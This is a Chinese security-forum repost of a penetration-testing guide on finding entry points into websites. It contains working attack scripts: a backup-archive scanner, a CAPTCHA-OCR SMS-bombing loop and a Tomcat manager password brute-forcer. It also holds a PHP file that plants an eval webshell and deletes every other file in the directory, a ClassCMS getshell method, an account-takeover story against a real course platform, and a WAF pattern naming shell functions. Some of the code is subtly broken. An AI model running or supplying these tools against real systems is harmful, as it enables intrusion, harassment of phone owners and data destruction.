安全矩阵

 找回密码
 立即注册
搜索
查看: 871|回复: 0

渗透测试思路分享-寻找入口(干货)

[复制链接]

260

主题

275

帖子

1065

积分

金牌会员

Rank: 6Rank: 6

积分
1065
发表于 2022-12-4 22:51:24 | 显示全部楼层 |阅读模式
本帖最后由 luozhenni 于 2022-12-4 22:51 编辑


渗透测试思路分享-寻找入口(干货)
原文链接:渗透测试思路分享-寻找入口(干货)
Linux网络安全 2022-12-04 11:32 发表于北京
寻找入口
在做完信息收集的时候,拿到了一堆自认为很有用的信息的时候,之后就很迷茫了,怎么办,接下来要干什么呢?
目录扫描和敏感文件扫描
多么简单的事情,扫一波目录,还有敏感文件
不知道你们有没有用过挖掘机,我感觉挖掘机最好的地方就是他可以根据域名的不同直接生成域名压缩包字典
例如:
  1.         域名为:www.starsnowsec.cn

  2.         挖掘机生成字典为:

  3.                         www.starsnowsec.cn.zip

  4.                         www.starsnowsec.cn.tar

  5.                         starsnowsec.cn.zip

  6.                         .........
复制代码

就靠这个东西,我到现在扫到了大概三四十个源码包现在网上的大概都是有后门的,或者正版收费的,所以我自己写了一个
用轮子改了一下,增加了一个生成字典功能
(python写的不好,狗头保命)
  1. #coding:utf-8
  2. import requests
  3. import sys
  4. import re
  5. import tldextract

  6. wwwtype = []
  7. name = []
  8. dict = []
  9. url = []
  10. wwwname = []
  11. dirs = ["wwwroot.zip","wwwroot.rar","www.rar","www.zip","web.rar","web.zip","db.rar","db.zip","wz.rar","wz.zip","fdsa.rar","fdsa.zip","wangzhan.rar","wangzhan.zip","root.rar","root.zip","admin.rar","admin.zip","data.rar","gg.rar","vip.rar","1.zip","1.rar","2.zip","2.rar","config.rar","config.zip","/config/config.rar","/config/config.zip"]
  12. headers = {
  13.         'Host': '',
  14.         'Cache-Control': 'max-age=0',
  15.         'Upgrade-Insecure-Requests': '1',
  16.         'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36',
  17.         'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
  18.         'Accept-Encoding': 'gzip, deflate',
  19.         'Accept-Language': 'zh-CN,zh;q=0.9',
  20.         'Cookie': '',
  21.         'Connection': 'close',
  22. }

  23. #生成字典
  24. def createdict(url):
  25.         url = url.replace('https://','')
  26.         url = url.replace('http://','')
  27.         url = url.replace('/','')
  28.         url = url.replace('\\','')
  29.         # 一级域名
  30.         domain = tldextract.extract(url).domain
  31.         # 二级域名
  32.         subdomain = tldextract.extract(url).subdomain
  33.         # 后缀
  34.         suffix = tldextract.extract(url).suffix
  35.         # print(u"获取到的一级域名:{}".format(domain))
  36.         # print(u"获取到二级域名:{}".format(subdomain))
  37.         # print(u"获取到的url后缀:{}".format(suffix))
  38.         fd = open( "type.txt", "r" )
  39.         for line in fd.readlines():
  40.                 line = line.replace('\n','')
  41.                 wwwtype.append(line)
  42.         for i in wwwtype:
  43.                 name.append(domain + '.' + i)
  44.                 name.append(subdomain + '.' + i)
  45.                 name.append(suffix + '.' + i)
  46.         name.extend(dirs)
  47.         for i in name:
  48.             if not i in wwwname:
  49.                 wwwname.append(i)
  50.         return wwwname

  51. #获取url文件
  52. def geturl(): #name为文件名
  53.         fd = open( "www.txt","r" )
  54.         for line in fd.readlines():
  55.                 line = line.replace('\n','')
  56.                 #获取url的生成字典
  57.                 createdict(line)
  58.                 for zip in wwwname:
  59.                         url.append(line + zip)
  60.                 for wwwurl in url:
  61.                         try:
  62.                                 r = requests.head(wwwurl,headers=headers,timeout=3)
  63.                                 print("[*]URL:" + wwwurl + "   Code:" + str(r.status_code))
  64.                                 log = open('log.txt','a+')
  65.                                 log.write("[*]URL:" + wwwurl + "   Code:" + str(r.status_code) + '\n')
  66.                                 log.close()
  67.                                 if(r == 200):
  68.                                         ret = r.headers
  69.                                         print(ret)
  70.                                         if 'content-length' in ret.keys(): # if Flase  执行
  71.                                                 size = None
  72.                                         else:  # true的情况下bai执行
  73.                                                 size = ret['content-length']
  74.                                                 size = int(size) / 1024
  75.                                                 if size > 1024:
  76.                                                         print(TURL+'\n')
  77.                                                         print('Size: %s KB' %size)
  78.                                                         success = open('success.txt','a+')
  79.                                                         success.write("[*]Success! URL:" + wwwurl + "  Size:" + str(size) + '\n')
  80.                                                         success.close()
  81.                                                 else:
  82.                                                         print("[*]Not Found in this url:" + wwwurl + '\n')
  83.                                                         error = open('error.txt','a+')
  84.                                                         error.write("[*]Not Found in this url:" + wwwurl + '\n')
  85.                                                         error.close()

  86.                         except:
  87.                                 print("[*]Something Wrong!" + wwwurl)

  88. geturl()
复制代码

Tips: 学安全一定要学会写exp哦!
编辑
编辑
在目录下直接新建一个www.txt还有type.txt,然后写上域名和压缩包后缀名就可以了,url可以多行哦
利用点

前言
笔者列举的都是一些容易出现漏洞的地方,可能也不是特别详细,希望大佬指出
寻找可以利用的地方,去发现可能存在漏洞的地方,比如
搜索框
可能存在sql注入或者xss漏洞
修改密码和
修改密码的地方,之前上网课,咳咳,学安全的不打一下真的感觉对不起自己
  1. 用的网课平台是一个新平台,就代表存在漏洞的点肯定会不少,

  2. 我注册了一个老师账号,和一个学生账号,测试发现,在老师查看作业,留言的地方存在存储xss

  3. 你们可能会想,存储xss直接拿cookie

  4. 哈哈哈哈隔,我也是这样想的,然后cookie属性http-only....

  5. 难受得一批,但是,这么明显的漏洞都会存在,肯定也会存在其他的漏洞,然后再修改密码的地方发现,没有验证旧密码,直接就是新密码提交,并且没有csrf-token验证

  6. 呕吼,配合存储xss,Csrf+Xss组合拳成功上线教师账号
复制代码
这些都是一些容易忽略的地方,但是越是容易忽略的地方越是可能存在漏洞的地方,一般平台更新新UI的时候,都会吧旧平台直接放在一边,没有删除,但是根据百度快照一类的都可以找到,然后重现进行利用,毕竟有了新版本,老版本一般不会多做修改,
robots.txt
一定不要忘记,说不定会有惊喜
js文件爆破
js爆破也不要忘记,很多接口都会存在在js文件中,可能根据js文件就能找到网站后台管理的接口位置,然后顺藤摸瓜找到网站后台管理
burpsuite是一个好帮手,burpsuite不要放过每一个包,有很多开发都是没有多少安全意识的,或者安全做的并不是特别理想,网站后台是靠js文件来判断Cookie然后是否跳转到登录页面,这种操作不能说常见,但是也不少见,一般这种很容易的就能够认出来,在进入网站登录页面的时候,直接跳转到了管理页面,然后突然跳转到登录页面,在这个时候抓包的时候就能够看到网站管理页面,或者直接bp将跳转包Drop掉,或者直接禁用js,但是有一个缺点,可能你管理页面里面的功能也没有办法使用
留言的地方,看看是否存在Xss拿admin的cookie
文件上传
之前看到过好多地方,但是实战中没用到过,就是iis和apache的解析漏洞,真的是一次都没有遇见过,难受的一批,
文件上传如果为白名单,一定要先测试一下允许的白名单后缀名为那些后缀名,尝试00绕过,
黑盒测试的时候,直接bp跑一下fuzz字典,这个时候就体现了fuzz字典的好不好了
编辑
代码审计
牛逼的大佬都是要会代码分析的,搞Web的大佬我感觉应该是要学一些PHP,Java,Python,Asp。。。
CTF里主流就是PHP(个人感觉),PHP的一些主流框架,TP,Laravel等,和一些CMS审计技巧
Python的Flask等
Java的Struts2等
Asp我在实战中见过的很少(我确实太lj了,哭~~)
代码审计的一些技巧,网上的教程都是有很多的
我见过的代码审计文章第一步都是要通读代码,搞清楚代码如何运作,是否使用框架开发等,然后白盒测试
之前SXC的公开赛中,有幸参与了命题,为了这个出题,专门审了一个ClassCMS的后台getshell漏洞(复现和原题在Freebuf公众号应该都有,Freebuf直接搜索SXC,或者ClassCMS)
编辑
编辑
该CMS是一个小众CMS,配置文件直接都是存放在GLOBALS全局变量中,
审计代码一般都是从前台和后台登录中的sql注入进行
该CMS在每个用户可控的函数都加了一个escape自定义函数进行过滤
class/cms/cms.php 文件
编辑
编辑
该CMS可以使用Mysql连接数据库也可以使用Sqlite来使用,然后进行判断全局变量时安装选择的类型进行判断使用哪种过滤
这个地方就会将上面的地方进行闭合,从而没有办法进行sql注入(可能笔者太菜,没有办法找到绕过的方法,哭~~~)
然后一些sql注入审计也就没了希望,前台功能也非常的少,没有利用的地方,直接进入后台找一些文件上传,文件
编辑
能够看到,功能点非常的少,非常难受
但是有个点,商店管理,里面的一些插件说不定可以有一些收货,然后在审计应用商店的代码的时候,可以发现,系统直接将用户传参过来的值进行curl操作,并解压
直接查看/class/shop/shop.php 的第82行
  1.     function download($url,$filepath) {
  2.         $curl=curl_init();
  3.         curl_setopt($curl,CURLOPT_URL,$url);
  4.         if(!$fp = @fopen ($filepath,'w+')) {
  5.             Return false;
  6.         }
  7.         curl_setopt($curl,CURLOPT_FILE, $fp);
  8.         curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,10);
  9.         curl_setopt($curl,CURLOPT_TIMEOUT,300);
  10.         curl_setopt($curl,CURLOPT_SSL_VERIFYPEER,FALSE);
  11.         curl_setopt($curl,CURLOPT_SSL_VERIFYHOST,FALSE);
  12.         $info=curl_exec($curl);
  13.         $httpinfo=curl_getinfo($curl);
  14.         curl_close($curl);
  15.         fclose($fp);
  16.         if($httpinfo['http_code']>=300) {@unlink($filepath);Return false;}
  17.         Return $info;
  18.     }
复制代码
然后直接在后台下载应用时,后台会对接口传参一个url地址,在传参时将url地址更改为自己小马的地址就能够成功getshell
(SXC的WP出来的时候,ClassCMS的作者大大找过来了,哈哈哈哈哈哈哈哈嗝)
在代码审计时候可以使用debug来进行白盒测试,有利于提高效率
也可以使用Seay源代码审计系统来进行审计,可以自行增加插件来更好的代码审计
悬剑CTF版中推荐的代码审计有两种工具
编辑
并且内置了一些代码审计资料的整理(爱了爱了)~~
编辑
有兴趣的大佬可以自行下载尝试
(大佬说,他们那边五分钟审一套源码,慕了)
逻辑漏洞
逻辑漏洞这种东西比较笼统一点,通常为业务逻辑漏洞,为开发者代码逻辑没有写到位
短信轰炸
一般这个地方也可以尝试测一测,也是一个低危,(蚊子再小也是肉)
在短信或者邮箱发送的时候如果存在验证码识别,可以通过写脚本来实现识别验证码来绕过验证码实现短信邮箱轰炸
  1. #coding:utf-8
  2. from PIL import Image
  3. import time
  4. from selenium import webdriver
  5. import pytesseract
  6. import requests
  7. import re

  8. for i  in xrange(1,100):
  9.     date = time.strftime("%Y%m%d%H%M%S",time.localtime(time.time()))
  10.     url = "https://127.0.0.1/register/register.jsp"
  11.     s = requests.session()
  12.     r = s.get(url,verify=False)
  13.     reg = re.compile(' <img id="vcImage" alt=\'vcImg\' src="(.*?)"')
  14.     d = reg.findall(r.text)
  15.     print(u"匹配验证码地址:")
  16.     print (u"https://127.0.0.1/register/" + d[0])
  17.     url_1 = u"https://127.0.0.1/register/" + d[0]

  18.     r = s.get(url_1,verify=False)
  19.     photo = (r.text).encode('latin1','ignore')
  20.     if r.status_code==200:
  21.             imgname = date + '.jpg'
  22.             print(u'下载图片'+imgname)
  23.             with open(imgname, 'wb') as fd:
  24.                 fd.write(r.content)
  25.             print(u"识别验证码为:")
  26.             print pytesseract.image_to_string(imgname)
  27.             code = pytesseract.image_to_string(imgname)
  28.             url_2 = "https://127.0.0.1/register/sendPhoneVerifyCode.jsp?mobile_number=18888888888&imgCode=" + code
  29.             r = s.post(url_2,verify=False)
  30.             print (r.text)
  31.             #time.sleep(1)
  32.     pass

复制代码
这是之前在某天专属挖到的一个短信轰炸,这种漏洞就是在接口对手机号是否发送和发送时间做验证,只对验证码做了校验还有一些可以尝试增加一些像+86,等的一些来绕过时间或者次数限制
修改密码和找回密码
这个地方也经常会存在一些逻辑漏洞
在找回密码和修改密码的时候,
SSRF等
重点
只要记住细心就好,任何交互的地方都可能存在漏洞
  1. (
  2.         问:小影子,目标是纯静态网站怎么办?
  3.         答(内心) :直接跑到机房物理攻击
  4.         答:先找到真实IP,然后扫描其他可用的端口,实在不行就换目标,如果目标没有其他端口可以利用,只存在了一些类似于80,22这两个端口,可以尝试爆破以下子域名,因为服务器可能将域名进行了端口转发,将本地的某个端口流量转发到80端口,这个可以在实战中可以在信息收集的时候进行,一定要踩好点,这样前期做了大量准备,到最后才不会突然半途而废。
  5. )
复制代码
中间件和框架
判断框架类型
直接目录报错,查看404 或者500的界面,熟悉tp或者laravel的人一眼就能够看出来是这个框架,一般在报错的时候,都会有框架的名字,包括二开,换皮的一些产品
大佬写的TP框架利用工具
  1. 之前见过换皮印象最深的一个是,一个网络公司,然后那个公司官网报价我看了,1298RMB

  2. 可能也不算特别贵,但是看到内容的时候,嗯,真tm的贵,坑213呢

  3. 换的是phpcms_v9的皮

  4. 所有报错页面都换了,然后后台登录的地方换了名字,把phpcms_v9换成了他们公司名称,然后版权所有换成了他们公司,嗯,这可能还没有办法直接说他是换皮,说不定是像,然后,登录admin账户次数过多还是什么的时候,蹦出来一个phpcms_v9提示你。。。。。
复制代码
现在网上这些中间件和框架基本每个版本的都是有漏洞的包括一些新版本,TP5.x的一些RCE,TP3.x的日志文件,laravel的sql注入,然后再加上大佬的0day,不知道会有多少漏洞
Struts2
然后还有Struts2
  1. ==漏洞编号==============影响版本=========================官方公告==========================================影响范围=====
  2. S2-057 CVE-2018-11776   Struts 2.3 to 2.3.34,Struts 2.5 to 2.5.16  https://cwiki.apache.org/confluence/display/WW/S2-057 影响范围非常小
  3. S2-048 CVE-2017-9791   Struts 2.3.X  http://127.0.0.1:8090/struts2-showcase/integration/saveGangster.action 影响范围非常小
  4. S2-046 CVE-2017-5638        Struts 2.3.5-2.3.31,Struts 2.5-2.5.10        http://struts.apache.org/docs/s2-046.html 和S2-045一样
  5. S2-045 CVE-2017-5638        Struts 2.3.5-2.3.31,Struts 2.5-2.5.10        http://struts.apache.org/docs/s2-045.html 影响范围较大
  6. S2-037 CVE-2016-4438        Struts 2.3.20-2.3.28.1        http://struts.apache.org/docs/s2-037.html 影响范围小
  7. S2-032 CVE-2016-3081        Struts 2.3.18-2.3.28        http://struts.apache.org/release/2.3.x/docs/s2-032.html 影响范围小
  8. S2-020 CVE-2014-0094        Struts 2.0.0-2.3.16        http://struts.apache.org/release/2.3.x/docs/s2-020.html 影响范围小
  9. S2-019 CVE-2013-4316        Struts 2.0.0-2.3.15.1        http://struts.apache.org/release/2.3.x/docs/s2-019.html 影响范围一般
  10. S2-016 CVE-2013-2251        Struts 2.0.0-2.3.15        http://struts.apache.org/release/2.3.x/docs/s2-016.html 影响范围非常大
  11. S2-013 CVE-2013-1966        Struts 2.0.0-2.3.14        http://struts.apache.org/release/2.3.x/docs/s2-013.html 未添加,S2-016范围内
  12. S2-009 CVE-2011-3923        Struts 2.0.0-2.3.1.1        http://struts.apache.org/release/2.3.x/docs/s2-009.html 未添加,S2-016范围内
  13. S2-005 CVE-2010-1870        Struts 2.0.0-2.1.8.1        http://struts.apache.org/release/2.2.x/docs/s2-005.html 未添加,S2-016范围内
复制代码
Tomcat
tomcat的一些反序列化漏洞,和今年HVV爆出的0day漏洞
tomcat的manger的爆破
  1. #!/usr/bin/env python
  2. # -*- coding: utf-8 -*-
  3. import sys
  4. import requests
  5. import threading
  6. import Queue
  7. import time
  8. import base64
  9. import os
  10. #headers = {'Content-Type': 'application/x-www-form-urlencoded','User-Agent': 'Googlebot/2.1 (+http://www.googlebot.com/bot.html)'}
  11. u=Queue.Queue()
  12. p=Queue.Queue()
  13. n=Queue.Queue()
  14. #def urllist()
  15. urls=open('url.txt','r')
  16. def urllist():
  17.     for url in urls:
  18.         url=url.rstrip()
  19.         u.put(url)
  20. def namelist():
  21.     names=open('name.txt','r')
  22.     for name in names:
  23.         name=name.rstrip()
  24.         n.put(name)

  25. def passlist():
  26.     passwds=open('pass.txt','r')
  27.     for passwd in passwds:
  28.         passwd=passwd.rstrip()
  29.         p.put(passwd)

  30. def weakpass(url):
  31.     namelist()
  32.     while not n.empty():
  33.         name =n.get()
  34.         #print name
  35.         passlist()
  36.         while not p.empty():
  37.             good()
  38.             #name = n.get()
  39.             passwd = p.get()
  40.             #print passwd
  41.             headers = {'Authorization': 'Basic %s==' % (base64.b64encode(name+':'+passwd))}
  42.             try:
  43.                 r =requests.get(url,headers=headers,timeout=3)
  44.                 #print r.status_code
  45.                 if r.status_code==200:
  46.                     print '[turn] ' +url+' '+name+':'+passwd
  47.                     f = open('good.txt','a+')
  48.                     f.write(url+' '+name+':'+passwd+'\n')
  49.                     f.close()
  50.                 else:
  51.                     print '[false] ' + url+' '+name+':'+passwd
  52.             except:
  53.                 print '[false] '  + url+' '+name+':'+passwd

  54. def list():
  55.     while u.empty():
  56.         url = u.get()
  57.         weakpass(name,url)

  58. def thread():
  59.     urllist()
  60.     tsk=[]
  61.     for i in open('url.txt').read().split('\n'):
  62.         i = i + '/host-manager/html'
  63.         t = threading.Thread(target=weakpass,args=(i,))
  64.         tsk.append(t)
  65.     for t in tsk:
  66.         t.start()
  67.         t.join(1)
  68.         #print "current has %d threads" % (threading.activeCount() - 1)
  69. def good():
  70.     good_ = 0
  71.     for i in open('good.txt').read().split('\n'):
  72.         good_+=1
  73.     os.system('title "weakpass------good:%s"' % (good_))

  74. if __name__=="__main__":
  75.    # alllist()
  76.     thread()

复制代码
这些中间件和框架的漏洞非常多,直接找到中间件或者框架的版本,直接exp一把梭,运气好就穿了
  1. (
  2.         问:小影子,我没有找到中间件或者框架的漏洞的版本怎么办?
  3.         答:在文件头,readme.txt,或者报错的地方,都是可能找到版本的地方
  4.         
  5.         问:小影子,我要是在ctf比赛中考点是一些已经爆出的cve漏洞,但是我并没有了解过,而且比赛现场要断网怎么办?
  6.         答:我最后打的几次比赛全都有那种已经爆出的CVE中间件或者框架漏洞,所有平时都要去收集这些漏洞,这样线下赛时才不会慌
  7. )
复制代码
CTF(附加)

CTF线下搅屎
说到了CTF,分享一个循环创建shell文件且删除除目录下的所有文件的php文件
  1. <?php
  2. /*
  3. * @Author: L3m0n
  4. * @Date:   2015-04-21 20:29:59
  5. * @Last Modified by:   Administrator
  6. * @Last Modified time: 2015-04-22 00:59:26
  7. */
  8. set_time_limit(0);
  9. $a = '<?php eval($_POST[likectflala]);?>';
  10. $self = explode("/",@$_SERVER[PHP_SELF]);
  11. $open = opendir('./');
  12. $num1 = count($self)-1;
  13. //while(1){
  14.     if(!file_exists('likectf.php')){
  15.         file_put_contents('likectf.php',$a);
  16.     }
  17.     while($file = readdir($open)){
  18.         if($file!=$self[$num1] && $file!='likectf.php'){
  19.             @unlink($file);
  20.         }
  21.     }
  22. //}
  23. echo '<meta http-equiv="refresh" content="0.1">';
  24. ?>
复制代码
AWD WAF
  1. <?php
  2. error_reporting(0);
  3. define('LOG_FILENAME', 'log.txt');        
  4. function waf() {
  5.     if (!function_exists('getallheaders')) {
  6.         function getallheaders() {
  7.             foreach ($_SERVER as $name => $value) {
  8.                 if (substr($name, 0, 5) == 'HTTP_') $headers[str_replace(' ', '-', ucwords(strtolower(str_replace('_', ' ', substr($name, 5))))) ] = $value;
  9.             }
  10.             return $headers;
  11.         }
  12.     }
  13.     $get = $_GET;
  14.     $post = $_POST;
  15.     $cookie = $_COOKIE;
  16.     $header = getallheaders();
  17.     $files = $_FILES;
  18.     $ip = $_SERVER["REMOTE_ADDR"];
  19.     $method = $_SERVER['REQUEST_METHOD'];
  20.     $filepath = $_SERVER["SCRIPT_NAME"];
  21.     //rewirte shell which uploaded by others, you can do more
  22.     foreach ($_FILES as $key => $value) {
  23.         $files[$key]['content'] = file_get_contents($_FILES[$key]['tmp_name']);
  24.         file_put_contents($_FILES[$key]['tmp_name'], "virink");
  25.     }
  26.     unset($header['Accept']); //fix a bug
  27.     $input = array(
  28.         "Get" => $get,
  29.         "Post" => $post,
  30.         "Cookie" => $cookie,
  31.         "File" => $files,
  32.         "Header" => $header
  33.     );
  34.     //deal with
  35.     $pattern = "select|insert|update|delete|and|or|\'|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile|dumpfile|sub|hex";
  36.     $pattern.= "|file_put_contents|fwrite|curl|system|eval|assert";
  37.     $pattern.= "|passthru|exec|system|chroot|scandir|chgrp|chown|shell_exec|proc_open|proc_get_status|popen|ini_alter|ini_restore";
  38.     $pattern.= "|`|dl|openlog|syslog|readlink|symlink|popepassthru|stream_socket_server|assert|pcntl_exec";
  39.     $vpattern = explode("|", $pattern);
  40.     $bool = false;
  41.     foreach ($input as $k => $v) {
  42.         foreach ($vpattern as $value) {
  43.             foreach ($v as $kk => $vv) {
  44.                 if (preg_match("/$value/i", $vv)) {
  45.                     $bool = true;
  46.                     logging($input);
  47.                     break;
  48.                 }
  49.             }
  50.             if ($bool) break;
  51.         }
  52.         if ($bool) break;
  53.     }
  54. }
  55. function logging($var) {
  56.         date_default_timezone_set("Asia/Shanghai");//修正时间为中国准确时间
  57.         $time=date("Y-m-d H:i:s");//将时间赋值给变量$time
  58.     file_put_contents(LOG_FILENAME, "\r\n\r\n\r\n" . $time . "\r\n" . print_r($var, true) , FILE_APPEND);
  59.     // die() or unset($_GET) or unset($_POST) or unset($_COOKIE);
  60.    
  61. }
  62. waf();
  63. ?>

复制代码
后言

多去Google,百度一类的,大佬们的思路真的很牛啤,一个思路记住了(好记性不如烂笔头!),以后遇见差不多的情况,都会想到这种骚姿势,
编辑
编辑
编辑
听莫天前审核大佬说,做审核最好的地方就是能看到许多骚姿势,有些骚姿势是真的想不到的。
作者:影子转载自:https://www.cnblogs.com/Y1ngZi/p/15069849.html
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-29 06:51 , Processed in 0.014324 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表